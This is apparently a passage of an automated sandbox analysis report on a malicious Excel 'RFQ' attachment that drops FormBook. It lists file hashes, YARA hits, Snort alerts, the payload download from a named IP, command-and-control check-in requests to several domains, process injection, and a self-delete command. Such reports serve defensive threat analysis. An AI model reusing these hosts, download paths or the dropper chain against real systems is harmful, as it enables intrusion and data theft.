                                              Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                              C:\Users\user\Desktop\~$(RFQ) No.109050.xlsx
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):330
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                              Malicious:true
                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              C:\Users\Public\vbc.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):538624
                                              Entropy (8bit):7.1421525751651425
                                              Encrypted:false
                                              SSDEEP:12288:aWHCM2K4CXmePITM0KbDAa8p0MQRqPbPJ3jNWAYH+jbRX2t:23CXXPIQ0gvM9DxtYH+92
                                              MD5:A3F424F32B637CB917E6596FAE56E401
                                              SHA1:9FF12D1CFCA13F94EEDBEB016974ECAE44B56266
                                              SHA-256:32258A09DDCB62EA68D47261889D0E888723AFBAB1BC4A3F137EC2E3C0DC01D4
                                              SHA-512:F238DD5F32E4D862C19F40B5264F0093DD6BBA251DB6FF68FD42D9BE8331111661781DDAB85E0DE3FE4F9B6A919E15782855EE329FE8CCAFB3641523FF0BA0C5
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%

                                              Static File Info

                                              General

                                              File type:CDFV2 Encrypted
                                              Entropy (8bit):7.987872651324991
                                              TrID:
                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                              File name:(RFQ) No.109050.xlsx
                                              File size:596992
                                              MD5:34cc835409afb805f20b811796d3b1fd
                                              SHA1:90b0fe9c48bb9915e2202e905baa3029ebc6f541
                                              SHA256:bb916fab1615d4fab5ba566bd01d7d89eb13c586d8ece170b556f7fc8437658c
                                              SHA512:e9d0366bf5beceead9fa2c1a6895ab9a74a214a9fded46ce1021e1254c6eafb4c6db3c0d55eae94896edbe41de02aa9e7bf76f1dcfa0cd092de4b544c0bb1ac1
                                              SSDEEP:12288:lm/+veTAqlDk+dodQ9TdIXpyXngu5RR7dc4/uwUR+A4hFYSAj542ds4Ca6:02eTA6fw2dTXngu5RR7hA4rTg4264L6

                                              File Icon

                                              Icon Hash:e4e2aa8aa4b4bcb4

                                              Network Behavior

                                              Snort IDS Alerts

                                               Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                               09/15/21-11:43:28.657859 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49167 | 80 | 192.168.2.22 | 34.102.136.180
                                               09/15/21-11:43:28.657859 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49167 | 80 | 192.168.2.22 | 34.102.136.180
                                               09/15/21-11:43:28.657859 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49167 | 80 | 192.168.2.22 | 34.102.136.180
                                               09/15/21-11:43:28.772925 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 34.102.136.180 | 192.168.2.22
                                               09/15/21-11:43:39.395982 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 34.98.99.30 | 192.168.2.22

                                              Network Port Distribution

                                              TCP Packets

                                               Timestamp | Source Port | Dest Port | Source IP | Dest IP

                                              UDP Packets

                                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                               Sep 15, 2021 11:43:17.547328949 CEST | 52167 | 53 | 192.168.2.22 | 8.8.8.8
                                               Sep 15, 2021 11:43:17.581933975 CEST | 53 | 52167 | 8.8.8.8 | 192.168.2.22
                                               Sep 15, 2021 11:43:22.596507072 CEST | 50591 | 53 | 192.168.2.22 | 8.8.8.8
                                               Sep 15, 2021 11:43:22.714829922 CEST | 53 | 50591 | 8.8.8.8 | 192.168.2.22
                                               Sep 15, 2021 11:43:28.594424963 CEST | 57805 | 53 | 192.168.2.22 | 8.8.8.8
                                               Sep 15, 2021 11:43:28.637029886 CEST | 53 | 57805 | 8.8.8.8 | 192.168.2.22
                                               Sep 15, 2021 11:43:33.835074902 CEST | 59030 | 53 | 192.168.2.22 | 8.8.8.8
                                               Sep 15, 2021 11:43:33.886842012 CEST | 53 | 59030 | 8.8.8.8 | 192.168.2.22
                                               Sep 15, 2021 11:43:39.212805986 CEST | 59185 | 53 | 192.168.2.22 | 8.8.8.8
                                               Sep 15, 2021 11:43:39.257781982 CEST | 53 | 59185 | 8.8.8.8 | 192.168.2.22

                                              DNS Queries

                                               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                               Sep 15, 2021 11:43:17.547328949 CEST | 192.168.2.22 | 8.8.8.8 | 0x8eb8 | Standard query (0) | www.hansel-design.com | A (IP address) | IN (0x0001)
                                               Sep 15, 2021 11:43:22.596507072 CEST | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.aubergetoitrouge.com | A (IP address) | IN (0x0001)
                                               Sep 15, 2021 11:43:28.594424963 CEST | 192.168.2.22 | 8.8.8.8 | 0xfc43 | Standard query (0) | www.corpmat.com | A (IP address) | IN (0x0001)
                                               Sep 15, 2021 11:43:33.835074902 CEST | 192.168.2.22 | 8.8.8.8 | 0x9c63 | Standard query (0) | www.afishin.com | A (IP address) | IN (0x0001)
                                               Sep 15, 2021 11:43:39.212805986 CEST | 192.168.2.22 | 8.8.8.8 | 0x30e0 | Standard query (0) | www.boxtobookshelf.com | A (IP address) | IN (0x0001)

                                              DNS Answers

                                               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                               Sep 15, 2021 11:43:17.581933975 CEST | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | Name error (3) | www.hansel-design.com | none | none | A (IP address) | IN (0x0001)
                                               Sep 15, 2021 11:43:22.714829922 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.aubergetoitrouge.com | aubergetoitrouge.com | - | CNAME (Canonical name) | IN (0x0001)
                                               Sep 15, 2021 11:43:22.714829922 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | aubergetoitrouge.com | - | 144.217.61.66 | A (IP address) | IN (0x0001)
                                               Sep 15, 2021 11:43:28.637029886 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | www.corpmat.com | corpmat.com | - | CNAME (Canonical name) | IN (0x0001)
                                               Sep 15, 2021 11:43:28.637029886 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | corpmat.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
                                               Sep 15, 2021 11:43:33.886842012 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | www.afishin.com | afishin.xshoppy.shop | - | CNAME (Canonical name) | IN (0x0001)
                                               Sep 15, 2021 11:43:33.886842012 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | afishin.xshoppy.shop | - | 75.2.89.208 | A (IP address) | IN (0x0001)
                                               Sep 15, 2021 11:43:39.257781982 CEST | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | www.boxtobookshelf.com | boxtobookshelf.com | - | CNAME (Canonical name) | IN (0x0001)
                                               Sep 15, 2021 11:43:39.257781982 CEST | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | boxtobookshelf.com | - | 34.98.99.30 | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • 198.12.84.109
                                              • www.aubergetoitrouge.com
                                              • www.corpmat.com
                                              • www.afishin.com
                                              • www.boxtobookshelf.com

                                              HTTP Packets

                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                               0 | 192.168.2.22 | 49165 | 198.12.84.109 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                               Timestamp | kBytes transferred | Direction | Data
                                               Sep 15, 2021 11:41:57.402611017 CEST | 0 | OUT | GET /cmd/vbc.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 198.12.84.109
                                              Connection: Keep-Alive
                                               Sep 15, 2021 11:41:57.576512098 CEST | 1 | IN | HTTP/1.1 200 OK
                                              Date: Wed, 15 Sep 2021 09:41:57 GMT
                                              Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
                                              Last-Modified: Wed, 15 Sep 2021 04:42:06 GMT
                                              ETag: "83800-5cc0151fdab7b"
                                              Accept-Ranges: bytes
                                              Content-Length: 538624
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                               1 | 192.168.2.22 | 49166 | 144.217.61.66 | 80 | C:\Windows\explorer.exe
                                               Timestamp | kBytes transferred | Direction | Data
                                               Sep 15, 2021 11:43:22.833062887 CEST | 565 | OUT | GET /r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1
                                              Host: www.aubergetoitrouge.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                               Sep 15, 2021 11:43:23.548243999 CEST | 566 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Wed, 15 Sep 2021 09:43:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 0
                                              Connection: close
                                              X-Powered-By: PHP/7.2.34
                                              Pragma: no-cache
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Set-Cookie: PHPSESSID=fifvcc2msr8fmhvo5t3hl5aru1; path=/
                                              Location: http://aubergetoitrouge.com/r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7
                                              X-Powered-By: PleskLin


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                               2 | 192.168.2.22 | 49167 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                               Timestamp | kBytes transferred | Direction | Data
                                               Sep 15, 2021 11:43:28.657859087 CEST | 567 | OUT | GET /r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1
                                              Host: www.corpmat.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                               Sep 15, 2021 11:43:28.772924900 CEST | 567 | IN | HTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Wed, 15 Sep 2021 09:43:28 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "6139efab-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49168 | 75.2.89.208 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 11:43:33.907896996 CEST | 568 | OUT | GET /r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1
Host: www.afishin.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 15, 2021 11:43:34.201092958 CEST | 569 | IN | HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Wed, 15 Sep 2021 09:43:34 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://www.afishin.com/r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.22 | 49169 | 34.98.99.30 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 11:43:39.279041052 CEST | 570 | OUT | GET /r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1
Host: www.boxtobookshelf.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 15, 2021 11:43:39.395982027 CEST | 570 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 15 Sep 2021 09:43:39 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6139efab-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


System Behavior

General

Start time: 11:41:21
Start date: 15/09/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13f120000
File size: 28253536 bytes
MD5 hash: D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 11:41:45
Start date: 15/09/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 11:41:48
Start date: 15/09/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\vbc.exe'
Imagebase: 0x330000
File size: 538624 bytes
MD5 hash: A3F424F32B637CB917E6596FAE56E401
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 11:41:50
Start date: 15/09/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\vbc.exe
Imagebase: 0x330000
File size: 538624 bytes
MD5 hash: A3F424F32B637CB917E6596FAE56E401
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 11:41:53
Start date: 15/09/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0xffa10000
File size: 3229696 bytes
MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

General

Start time: 11:42:05
Start date: 15/09/2021
Path: C:\Windows\SysWOW64\raserver.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\raserver.exe
Imagebase: 0x7c0000
File size: 101888 bytes
MD5 hash: 0842FB9AC27460E2B0107F6B3A872FD5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 11:42:12
Start date: 15/09/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\Public\vbc.exe'
Imagebase: 0x4a410000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
